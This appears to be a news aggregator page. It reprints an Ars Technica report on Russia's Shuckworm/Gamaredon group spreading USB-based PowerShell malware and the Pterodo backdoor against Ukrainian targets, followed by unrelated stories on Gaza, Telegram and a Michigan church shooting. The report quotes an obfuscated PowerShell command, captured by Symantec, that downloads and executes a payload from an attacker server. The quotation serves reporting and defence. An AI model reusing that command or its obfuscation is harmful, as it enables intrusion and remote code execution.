Connect with us

Published

on

LASER-FOCUSED — Russia-backed hackers unleash new USB-based malware on Ukraines military Shuckworm’s relentless attacks seek intel for use in Russia’s invasion of Ukraine.

Dan Goodin – Jun 15, 2023 10:30 am UTC EnlargeGetty Images reader comments 9 with

Hackers working for Russias Federal Security Service have mounted multiple cyberattacks that used USB-based malware to steal large amounts of data from Ukrainian targets for use in its ongoing invasion of its smaller neighbor, researchers said.

The sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information, researchers from Symantec, now owned by Broadcom, wrote in a Thursday post. There were indications in some organizations that the attackers were on the machines of the organizations human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.

The group, which Symantec tracks as Shuckworm and other researchers call Gamaredon and Armageddon, has been active since 2014 and has been linked to Russias FSB, the principal security service in that country. The group focuses solely on obtaining intelligence on Ukrainian targets. In 2020, researchers at security firm SentinelOne said the hacking group had attacked over 5,000 individual entities across the Ukraine, with particular focus on areas where Ukrainian troops are deployed.

In February, Shuckworm began deploying new malware and command-and-control infrastructure that has successfully penetrated the defenses of multiple Ukrainian organizations in the military, security services, and government of that country. Group members seem most interested in obtaining information related to sensitive military information that could be abused in Russias ongoing invasion.

This newer campaign debuted new malware in the form of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script activates when infected USB drives are connected to targeted computers. The malicious script first copies itself onto the targeted machine to create a shortcut file with the extension rtf.lnk. The files have names such as video_porn.rtf.lnk, do_not_delete.rtf.lnk, and evidence.rtf.lnk. The names, which are mostly in the Ukrainian language, are an attempt to entice targets to open the files so they will install Pterodo on machines. Advertisement

The script goes on to enumerate all drives connected to the targeted computer and to copy itself to all attached removable drives, most likely in hopes of infecting any air-gapped devices, which are intentionally not connected to the Internet in an attempt to prevent them from being hacked.

To cover its tracks, Shuckworm has created dozens of variants and rapidly rotated the IP addresses and infrastructure it uses for command and control. The group also uses legitimate services such as Telegram and its micro-blogging platform Telegraph for command and control in another attempt to avoid detection.

Shuckworm typically uses phishing emails as an initial vector into targets computers. The emails contain malicious attachments that masquerade as files with extensions, including .docx, .rar, .sfx, lnk, and hta. Emails often use topics such as armed conflicts, criminal proceedings, combating crime, and protecting children as lures to get targets to open the emails and click on the attachments.

Symantec researchers said that an infected computer they recovered in the campaign was typical for the way it works. They wrote: In one victim, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious Document.

After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers C&C server:

“CSIDL_SYSTEMcmd.exe” /c start /min “” powershell -w hidden
“$gt=’/get.’+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
dresslist[0];$client=(new-object
net.webclient);$faddr=’htt’+’ps://’+$addr+$gt;$text=$client.downloads
tring($faddr);iex $text”

More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.

Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the groups scripts observed per month between January and April 2023.

Thursdays post includes IP addresses, hashes, file names, and other indicators of compromise people can use to detect if they have been targeted. The post also warns that the group poses a threat that targets should take seriously.

This activity demonstrates that Shuckworms relentless focus on Ukraine continues, they wrote. It seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations. reader comments 9 with Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Advertisement Channel Ars Technica ← Previous story Next story → Related Stories Today on Ars

Continue Reading

World

Contact with two hostages ‘lost’ during Israeli operations in Gaza, Hamas’s armed group says

Published

on

By

Contact with two hostages 'lost' during Israeli operations in Gaza, Hamas's armed group says

Hamas’s armed group has claimed it has lost contact with two hostages as a result of Israel’s operations in Gaza – after it called on air deployments to be stopped for 24 hours.

In a statement, Hamas’s armed al-Qassam Brigades said it had demanded that Israel halt air sorties for 24 hours, starting at 6pm, in part of Gaza City, to remove the hostages from danger.

It comes a day before Israeli Prime Minister Benjamin Netanyahu is due to meet US President Donald Trump and as the number of those killed in Gaza surpasses the 66,000 mark, according to the enclave’s Hamas-run health ministry.

Its figure does not differentiate between civilians and fighters.

Please use Chrome browser for a more accessible video player

Volunteer nurse’s video diary of Gaza horrors

A total of 48 hostages are still being held captive by Hamas, the militant group which rules Gaza, with about 20 believed by Israel to still be alive. A total of 251 hostages were taken on 7 October 2023, when Hamas launched an unprecedented attack on Israel which killed 1,200 people.

Situation on the ground

In Gaza, a war-torn enclave where famine has been declared in some areas and where Israel has been accused of committing acts of genocide – which it has repeatedly denied – the almost two-year war raged on.

On Sunday, the number of those killed rose to at least 21 as five people were killed in an airstrike in the Al Naser area, local health authorities said, while medics reported 16 more deaths in strikes on houses in central Gaza.

The Civil Emergency Service in Gaza said late on Saturday that Israel had denied 73 requests, sent via international
organisations, to rescue injured Palestinians in Gaza City.

Israeli authorities had no immediate comment. The military earlier said forces were expanding operations in the city and
that five militants firing an anti-tank missile towards Israeli troops had been killed by the Israeli air force.

Read more:
Volunteer nurse’s video diary of Gaza horrors
Blair being lined up to lead temporary Gaza administration – reports

‘We will get it done’

In Monday’s White House meeting, President Trump is expected to share a new 21-point proposal for an immediate ceasefire.

His proposal would include the release of all hostages within 48 hours and a gradual withdrawal of Israeli forces from the Palestinian enclave, according to three Arab officials briefed on the plan, the PA news agency reports.

A Hamas official said the group was briefed on the plan but has yet to receive an official offer from Egyptian and Qatari mediators. Hamas has said it is ready to “study any proposals positively and responsibly”.

Mr Trump, who has been one of Israel’s greatest allies, said on Sunday there is “a real chance for greatness in the Middle East”.

It is unclear, however, what Mr Trump was specifically referring to.

He said in a Truth Social post: “We have a real chance for Greatness in the Middle East. All are on board for something special, first time ever. We will get it done.”

On Friday – the same day a video of diplomats walking out on Mr Netanyahu during his address to the United Nations went viral – Mr Trump said he believed the US had reached a deal on easing fighting in Gaza, saying it “will get the hostages back” and “end the war”.

Please use Chrome browser for a more accessible video player

Diplomats walk out as Israeli PM speaks at UN

“I think we maybe have a deal on Gaza, very close to a deal on Gaza,” the US president told reporters on the White House lawn as he was leaving to attend the Ryder Cup.

Mr Trump has repeatedly claimed an agreement to end the war was imminent, only for nothing to materialise.

Weeks ago, he said: “I think we’re going to have a deal on Gaza very soon.”

Continue Reading

Politics

French officials pressured Telegram to censor Moldova election posts: Durov

Published

on

By

French officials pressured Telegram to censor Moldova election posts: Durov

French officials pressured Telegram to censor Moldova election posts: Durov

Telegram co-founder Pavel Durov said that French intelligence pressured Telegram into censoring political content, which he refused to do.

Continue Reading

US

More victims expected after Mormon church in Michigan set on fire during mass shooting

Published

on

By

More victims expected after Mormon church in Michigan set on fire during mass shooting

A person has been killed and several others injured after a mass shooting and fire at a Mormon church in Michigan, police have said.

Authorities said at a news conference that the suspect was shot dead by police officers, and that nine others were injured.

Two of those were said to be in critical condition, Grand Blanc Township Chief William Renye told reporters.

Flames and smoke rising from the Church of Jesus Christ of Latter-day Saints in Grand Blanc. Pic: Julie J, @Malkowski6April / AP
Image:
Flames and smoke rising from the Church of Jesus Christ of Latter-day Saints in Grand Blanc. Pic: Julie J, @Malkowski6April / AP

He added that the suspect was a 40-year-old man from Burton, who drove his vehicle into the church and began firing rounds at the hundreds of people attending Sunday service.

The suspect used an assault rifle and deliberately started the blaze, Chief Renye said, before adding that officers believe they will find additional victims in the fire.

More on Michigan

Pics: AP
Image:
Pics: AP

The incident took place at around 11am local time at the Church of Jesus Christ of Latter-day Saints in Grand Blanc, about 50 miles north of Detroit.

In a statement on Sunday morning, Grand Blanc Township Police Department added that the church was “actively on fire” and urged the public to avoid the area.

Michigan governor Gretchen Whitmer said in a statement that “my heart is breaking for the Grand Blanc community” after the shooting.

She added: “Violence anywhere, especially in a place of worship, is unacceptable. I am grateful to the first responders who took action quickly.”

Sheriff: ‘Entire church is on fire’

Genesee County sheriff Christopher Swanson said at around 12.20pm (5.20pm in the UK) that the “entire church is on fire”, and confirmed that people who were at the church have been evacuated.

Around 20 minutes later, the police department said the fire had been contained.

The incident took place at the Church of Jesus Christ of Latter-day Saints in Grand Blanc
Image:
The incident took place at the Church of Jesus Christ of Latter-day Saints in Grand Blanc

US attorney general Pam Bondi also confirmed the FBI and the Bureau of Alcohol, Tobacco, Firearms and Explosives are responding to the incident.

US President Donald Trump said on Truth Social that “the suspect is dead, but there is still a lot to learn”, before saying the shooting “appears to be yet another targeted attack on Christians in the United States of America”.

He added: “PRAY for the victims, and their families. THIS EPIDEMIC OF VIOLENCE IN OUR COUNTRY MUST END, IMMEDIATELY!”

In the wake of the shooting and fire, the New York Police Department said it would deploy officers to religious institutions across the city “out of an abundance of caution”.

The incident occurred the morning after Russell M Nelson, the oldest-ever president of The Church of Jesus Christ of Latter-day Saints, died at 101.

Shootings reported in North Carolina, New Orleans, Texas

Meanwhile, authorities responded to a mass shooting at a coastal town in North Carolina late on Saturday, where three people were killed.

At least eight others were injured in that incident, where someone opened fire from a boat into a crowd at a bar.

Another shooting took place at a south Texas casino early on Sunday, with seven people shot and two killed.

A woman was also killed, and three others were injured in Bourbon Street, New Orleans, early on Sunday after a shooting.

Continue Reading

Trending